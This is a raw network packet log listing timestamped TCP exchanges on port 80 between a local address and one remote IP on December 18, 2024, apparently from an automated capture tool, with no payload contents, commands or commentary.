                                                                                                                Dec 18, 2024 14:18:16.207437038 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.207490921 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.208266973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.208281994 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.208312035 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.208929062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.208998919 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.209043026 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.209673882 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.209773064 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.209814072 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.210571051 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.210583925 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.210622072 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.211261034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.211364985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.211429119 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.212138891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.212245941 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.212290049 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.212914944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.213032961 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.213080883 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.213753939 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.213890076 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.213927031 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.214618921 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.214768887 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.214811087 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.215439081 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.215539932 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.215620995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.216284990 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.216413975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.216459990 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.217231989 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.217245102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.217288017 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.217849970 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.218004942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.218053102 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.218777895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.218924999 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.218967915 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.219616890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.219630003 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.219669104 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.220453978 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.220674038 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.220726013 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.221509933 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.221524000 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.221564054 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.222179890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.222268105 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.222311974 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.223017931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.223088980 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.223135948 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.223638058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.223824978 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.223865032 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.224620104 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.224833965 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.224877119 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.225285053 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.279468060 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.374795914 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.375390053 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.375408888 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.375421047 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.375535011 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.375535011 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.376450062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.376461983 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.376518965 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.377393007 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.377407074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.377460003 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.378241062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.378252029 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.378284931 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.379192114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.379204988 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.379225969 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.379235983 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.380146027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.380158901 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.380189896 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.380886078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.380898952 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.380933046 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.381778955 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.381803036 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.381814957 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.381824017 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.381844044 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.382824898 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.382838011 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.382874966 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.383934021 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.383945942 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.383986950 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.384422064 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.384433031 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.384469032 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.385363102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.385375023 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.385420084 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.386219978 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.386230946 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.386274099 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.387305975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.387324095 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.387382030 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.387424946 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.388295889 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.388313055 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.388325930 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.388349056 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.388376951 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.389370918 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.389380932 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.389434099 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.390058994 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.390069962 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.390108109 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.391323090 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.391335011 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.391374111 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.392303944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.392314911 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.392364979 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.393196106 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.393207073 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.393244982 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.394089937 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.394110918 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.394123077 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.394134998 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.394146919 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.394174099 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.395107031 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.395117998 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.395172119 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.396079063 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.396090031 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.396128893 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.397294998 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.397319078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.397330046 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.397368908 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.398134947 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.398154020 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.398164988 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.398183107 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.398214102 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.398953915 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.399424076 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.399462938 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.400347948 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.400358915 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.400388956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.401324034 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.401335955 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.401348114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.401391983 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.402111053 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.402129889 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.402153969 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.402421951 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.402457952 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.403436899 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.403448105 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.403476954 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.404623985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.404633999 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.404644966 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.404702902 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.405452013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.405471087 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.405488014 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.406399012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.406418085 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.406430006 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.406438112 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.406460047 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.407594919 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.407605886 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.407645941 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.408428907 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.408440113 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.408477068 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.408828020 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.409586906 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.409598112 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.409609079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.409647942 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.410623074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.410643101 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.410670042 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.411425114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.411443949 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.411454916 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.411473036 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.411492109 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.412482023 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.412493944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.412523985 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.413448095 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.413458109 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.413506985 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.414467096 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.414479017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.414520979 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.415251970 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.415261984 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.415293932 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.416165113 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.416176081 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.416188002 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.416210890 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.417021990 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.417041063 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.417064905 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.417979956 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.418001890 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.418019056 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.448437929 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.566828012 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.566849947 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.566919088 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.567084074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.567174911 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.567213058 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.567918062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.568042040 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.568084002 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.568744898 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.568908930 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.568986893 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.569595098 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.569710970 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.569807053 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.570357084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.570476055 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.570522070 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.571229935 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.571321964 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.571362972 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.572045088 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.572118044 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.572154045 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.572808027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.572900057 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.572941065 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.573669910 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.573712111 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.573748112 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.574414968 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.574647903 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.574692965 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.575331926 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.575407028 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.575443983 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.576085091 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.576253891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.576330900 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.576972008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.577043056 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.577086926 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.577754021 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.577816010 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.577858925 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.578586102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.578895092 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.578947067 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.579447985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.579605103 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.579642057 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.580312014 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.580324888 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.580363035 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.581079960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.581278086 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.581321001 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.581976891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.582003117 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.582041025 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.582705975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.582824945 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.582864046 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.583481073 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.583643913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.583683014 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.584372997 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.584415913 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.584455967 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.585134983 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.585300922 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.585339069 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.585946083 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.586055994 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.586092949 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.586883068 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.586925983 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.586961031 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.587982893 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.588038921 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.588080883 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.588423967 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.588596106 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.588634014 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.589386940 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.589519978 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.589560032 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.590159893 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.590279102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.590318918 CET4980780192.168.2.9185.215.113.16
